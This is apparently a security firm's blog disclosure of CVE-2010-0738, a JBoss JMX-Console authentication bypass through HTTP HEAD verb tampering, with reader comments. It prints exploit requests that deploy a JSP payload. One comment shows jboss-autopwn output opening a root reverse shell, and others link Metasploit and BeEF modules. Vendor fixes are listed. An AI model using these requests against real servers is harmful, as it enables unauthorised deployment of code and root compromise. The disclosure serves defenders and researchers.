Jboss has some good management tools that are used to deploy new applications and to perform privileged actions like executing scripts on the remote host. One of these is Jboss JMX-Console.
For more information on what an attacker may accomplish through the JMX-Console I suggest to read the following presentation:
Abusing Jboss by Christian Papathanasiou (Trustwave Spiderlabs)
Here at Minded Security we discovered something more. Jboss JMX console may be protected using a common password authentication, but the standard password configuration protection is vulnerable.
How many time someone suggested to you to secure the JMX console using the standard Jboss security configurations?
JMX Console standard security configuration is available in:
- jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml
This is the suggested security configuration also available in Jboss official security guidelines (“White Paper on JMX Security”):
- https://jira.jboss.org/jira/browse/SECURITY-31
The suggested configuration for protecting the JMX Console was the following one:
<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with the
role JBossAdmin to access the HTML JMX console web application
</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>
From the configuration above, security restrictions are enabled only for “GET” and “POST” methods. Any other HTTP method supported by the server will be not restricted.
By issuing a request with the “HEAD” method is possible to invoke directly, with “JBossAdmin” privilege, any functionality implemented by the jmx-console without valid credentials. Note: If JMX console replies with a HTTP 500 error the request has been correctly processed.
This kind of attack is referred in Appsec literature as Verb Tampering. The following one is a very good paper on this topic.
Bypassing with HTTP Verb Tampering by Arshan Dabirsiaghi - Aspect Security
The most interesting part is the exploitation. If we have access to any JMX console which is password protected or not, we can issue a HEAD HTTP request that will work ;D
Standard Deployment (will ask for password):
POST /jmx-console/HtmlAdaptor;index.jsp HTTP/1.1
....
content-lenght: 3512
action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&
arg3=%3C%25%40+page+import%3D%22java.io.*…....
Exploitation with Authentication Bypass:
HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1
Now pick the request you prefer and build your custom exploit!
Reference:
http://www.mindedsecurity.com/MSA030409.html (Official Advisory)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738
Solution:
A solution to this issue is already available. See the following RedHat advisories:
- https://rhn.redhat.com/errata/RHSA-2010-0376.html
- https://rhn.redhat.com/errata/RHSA-2010-0377.html
- https://rhn.redhat.com/errata/RHSA-2010-0378.html
- https://rhn.redhat.com/errata/RHSA-2010-0379.html
We would like to thank the RedHat response team in particular Marc Schoenefeld for his support, technical knowledge and fast response.
Awesome work Guys!
ReplyDeleteSteve
Hi guys.
ReplyDeleteWe are trying to test the exploit but it doesn't work; any other hint?
@Steve Thank you!
ReplyDelete@Frank
just supply the request like this:
HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aserv....
HTTP/1.1
Use GET parameters, not POST ;D should work
It works. Anyway I cannot get response output, since HEAD method is without response body.
ReplyDeleteDo you have any hint for issue a command to download JMX-Console configuration files?
Thank you
Got this working with JBoss-autopwn :-D
ReplyDeleteScreenshot below..
[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#
Will be testing it some more and sending you guys a copy soon :-)
Christian Papathanasiou.
@Chris: Very happy to see this new addition to jboss-autopwn! :D
ReplyDelete@Frank: We have developed a custom exploit that redirects temporarily the output to Jboss status page, which is not password protected by default. This issue has been fixed with "CVE-2010-1429". During the next few days we will publish it on our website, along with the official advisory.
is it possible to get a version of jboss-autopwn? want to test our jboss servers
ReplyDelete@Dennis You should ask to the author (Christian Papathanasiou), we don't know when he'll release it.
ReplyDeleteGuys, I have been trying to reproduce this vulnerability in version 4.0.4 and I haven't had much luck!!! :( Any ideas...???
ReplyDeleteA metasploit module now exist to abuse the issue as well.
ReplyDeletehttp://www.metasploit.com/redmine/projects/framework/repository/revisions/9285/entry/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
The verb tampering security issue in the JMX console has been ported also to BeEF many months ago (presented at CONFidence May 2011)
ReplyDeletehttp://antisnatchor.com/JBoss_JMX_Deploy_Exploit
Cheers
Michele
www.matasano.com/research/OWASP3011_Luca.pdf Preso containing CVE-2010-0738 and other useful details on hacking JBoss
ReplyDelete@Anonymous Thank you very much for that, that's one of the most comprehensive research about Jboss exploitation analysis.
ReplyDelete